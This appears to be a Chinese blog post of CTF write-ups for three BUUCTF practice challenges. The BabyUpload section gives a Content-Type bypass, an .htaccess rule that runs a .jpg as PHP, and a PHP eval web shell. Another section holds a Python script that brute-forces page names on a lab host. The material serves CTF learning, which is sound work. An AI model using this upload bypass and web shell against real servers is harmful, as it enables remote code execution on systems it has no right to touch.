BUUCTF刷题

[GXYCTF2019]BabyUpload

.htaccess

记得绕过Content-Type:image/jpeg

<FilesMatch "h3zh1.jpg"> 
    SetHandler application/x-httpd-php
</FilesMatch>

h3zh1.jpg

<script language="php">   
   eval($_POST['cmd']);
</script>

[BJDCTF 2nd]elementmaster

会python编写就好

这个题头秃,还记得初三时背元素周期表得恐惧。

import requests
url = "http://15330266-3d24-4154-9cb8-ad6a25f8ed02.node3.buuoj.cn/"

a_list=['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
        'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br',
        'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
        'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm',
        'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn',
        'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr',
        'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']
flag = ""
for i in a_list:
	r = requests.get(url+i+".php")
	if(r.status_code==200):#一定得写200因为不是每个元素都存在
	#	print(url+i+".php")
		flag += r.text
		print(flag)

[BJDCTF 2nd]Schrödinger

这个题我觉得就记一个时间戳这个知识点就好。

大师傅也说这个题辣眼睛。

做题唯一感受,离谱~。

151H0ZQPXMFRYYQT6@3WIS2

ca

原文地址:https://www.cnblogs.com/h3zh1/p/12839150.html